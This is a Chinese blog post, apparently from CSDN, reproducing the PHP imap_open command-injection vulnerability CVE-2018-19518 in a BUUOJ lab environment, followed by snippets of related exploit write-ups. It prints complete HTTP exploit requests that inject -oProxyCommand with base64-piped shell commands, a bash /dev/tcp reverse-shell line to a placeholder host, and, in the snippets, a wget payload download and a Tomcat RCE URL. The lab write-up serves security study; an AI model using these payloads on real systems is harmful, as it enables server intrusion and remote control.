PHP imap 远程命令执行漏洞复现(CVE-2018-19518)

最新推荐文章于 2024-05-14 12:35:26 发布
最新推荐文章于 2024-05-14 12:35:26 发布
阅读量517 收藏 2
点赞数 1
文章标签: php 服务器 ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ch258563/article/details/130957655
版权

漏洞概述

PHP 的imap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。该漏洞的存在是因为受影响的软件的imap_open函数在将邮箱名称传递给rsh或ssh命令之前不正确地过滤邮箱名称。如果启用了rsh和ssh功能并且rsh命令是ssh命令的符号链接,则攻击者可以通过向目标系统发送包含-oProxyCommand参数的恶意IMAP服务器名称来利用此漏洞。成功的攻击可能允许攻击者绕过其他禁用的exec 受影响软件中的功能,攻击者可利用这些功能在目标系统上执行任意shell命令。利用此漏洞的功能代码是Metasploit Framework的一部分。

影响范围

PHP 5.6.0版本至5.6.38版本

7.0.0版本至7.0.32版本

7.1.0版本至7.1.24版本

7.2.0版本至7.2.12版本

Debian Linux 8.0版本,9.0版本

漏洞复现

1、开启靶场环境,访问漏洞地址,bp开启抓包,点击submit

2、发送Repeater模块,直接上EXP进行漏洞利用(我们直接getshell)

 EXP如下:

POST / HTTP/1.1
Host: node4.buuoj.cn:25572
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://node4.buuoj.cn:25572
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://node4.buuoj.cn:25572/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

hostname=x+-oProxyCommand%3decho%09[base64的反弹shell指令]|base64%09-d|sh}&username=111&password=222

指令示例:echo 'bash -i >& /dev/tcp/x.x.x.x/6666 0>&1'>/tmp/test  #输出反弹shell指令写到tmp目录的test文件

注意事项:base64 编码中使用了加号(+),而 + 在 URL 传递时会被当成空格,因此必须要将 base64 编码后的字符串中的加号替换成 %2b 才能当作 URL 参数进行传递。否则在服务器端解码后就会出错。

“+” = %2b

“=” = %3d

编辑好exp发送请求,这里已经创建了test文件了

  3、执行创建的文件

同上一样,需要将+ = 进行url编码

POST / HTTP/1.1
Host: node4.buuoj.cn:25572
Content-Length: 159
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://node4.buuoj.cn:25572
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://node4.buuoj.cn:25572/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

hostname=x+-oProxyCommand%3decho%09L2Jpbi9iYXNoIC90bXAvdGVzdA%3d%3d|base64%09-d|sh}&username=111&password=222


指令:/bin/bash /tmp/test

4、VPS提前开启监听,成功getshell

 

 

 

PHP imap 远程命令执行漏洞CVE-2018-19518
玄道的网安博客
06-11 1255
1、简介 php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 2、影响版本 PHP:5.6.38 系统:Debian/ubuntu 3、漏洞复现 使用vulhub和dock
PHP--远程命令执行漏洞CVE-2018-19518复现
从不专注的人的博客
06-28 722
目录漏洞介绍漏洞复现进入容器移除环境 漏洞介绍 -php imap扩展用户在php中执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令。 -debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等。 -ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行
HFS远程命令执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-28 6026
漏洞程序下载地址:Http File Server 这里说一下,再Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。 运行程序截图如下 尝试访问该软件提供的web服务 web服务是这个样子的,这个web服务的搜索处存在漏洞 一、手工利用 payload如下 http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos
Vulhub Supervisord 远程命令执行漏洞复现
weixin_53696027的博客
06-07 411
Vulhub Supervisord 远程命令执行漏洞复现
vulhub-CVE-2018-1273远程命令执行漏洞复现
m0_62008601的博客
09-23 1418
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。看到靶机中已存在shll.elf文件。接着我们就需要开启监听,这时候用nc进行监听的话,收不到反弹的shell。发送命令之后返回500说明执行成功,接着我们登录到doker容器看到success文件成功被创建,说明漏洞存在。执行之后如果没成功反弹shell ,可以先执行赋予文件权限的命令。开启监听之后,再修改请求命令,让靶机执行木马文件上线。
CVE-2017-8464远程命令执行漏洞复现
u011215939的博客
12-20 1090
CVE-2017-8464远程命令执行漏洞复现 前言 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用
2024年最新PHP--远程命令执行漏洞CVE-2018-19518复现,2024年最新2024年C C++高级面试题总结
2401_84976030的博客
05-14 362
php imap扩展用户在php中执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令。-debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等。-ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行漏洞
cve-2018-19518 复现
最新发布
03-21
好的,用户想要复现CVE-2018-19518漏洞。首先我需要回忆这个漏洞的具体情况。根据引用中的信息,这个漏洞PHPimap扩展有关,存在远程命令执行的可能。用户提供的引用[2]提到初始界面是邮箱登录,有三个参数:邮箱...
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到漏洞效果,请勿非法使用,仅供学习研究
Typora-远程命令执行漏洞复现-CVE-2023-2317
apple_52661176的博客
08-31 431
Typora 是一款支持实时预览的 Markdown 文本编辑器。Windows和Linux版本存在一个安全漏洞,具体表现为在updater/update.html中存在DOM-based XSS漏洞。这个漏洞的危害是允许攻击者通过加载精心制作的markdown文件,来执行恶意的JavaScript代码。如果用户在Typora中打开了这个恶意markdown文件,或者从一个恶意网页复制文本并将其粘贴到Typora中,那么攻击者可以通过在<embed>标签中引用update.html来利用这个漏洞
Webmin远程命令执行漏洞复现
yuan_boss的博客
10-12 954
详细的来说,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。payload中的IP改为目标网站的IP,注意user=rootxx这部分,如果写的是user=root,肯定不能成功注入,必须是目标网站的服务器中不存在的用户,否则就会命令执行失败。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。
CVE-2021-32849 Gerapy远程命令执行漏洞复现
include_voidmain的博客
03-09 1293
CVE-2021-32849 Gerapy远程命令执行漏洞复现
Drupal远程命令执行漏洞复现
BerL1n
12-29 924
time: 2019-05-12 21:46 漏洞描述 Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。 漏洞检测 针对该漏洞,可采用两种方法进行检测: 方法一:登陆Drupal管理后台,查看内核版本是8.x,且版本号低于8.3.4,则存在该漏洞;否则,不存在该漏洞; 方法二:在Drupal根目录下找到文件/core/lib/Drupal/Com
Spring Data Commons远程命令执行漏洞复现CVE-2018-1273)
wutiangui的博客
09-10 1041
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
CVE-2019-15107 Webmin远程命令执行漏洞复现
EC_Carrot的博客
03-03 316
漏洞概括 Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。 影响版本: Webmin <= 1.920 环境搭建 自己用docker搭了个1.910版本的Webmin,具体操作… 漏洞的触发需要开启密码重置功能,需要把允许用户使用旧密码设置新密码的选项给选上。 登录
S2-062 远程命令执行漏洞复现(cve-2021-31805)
m0_52400001的博客
04-22 3093
S2-062 远程命令执行漏洞复现(cve-2021-31805)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值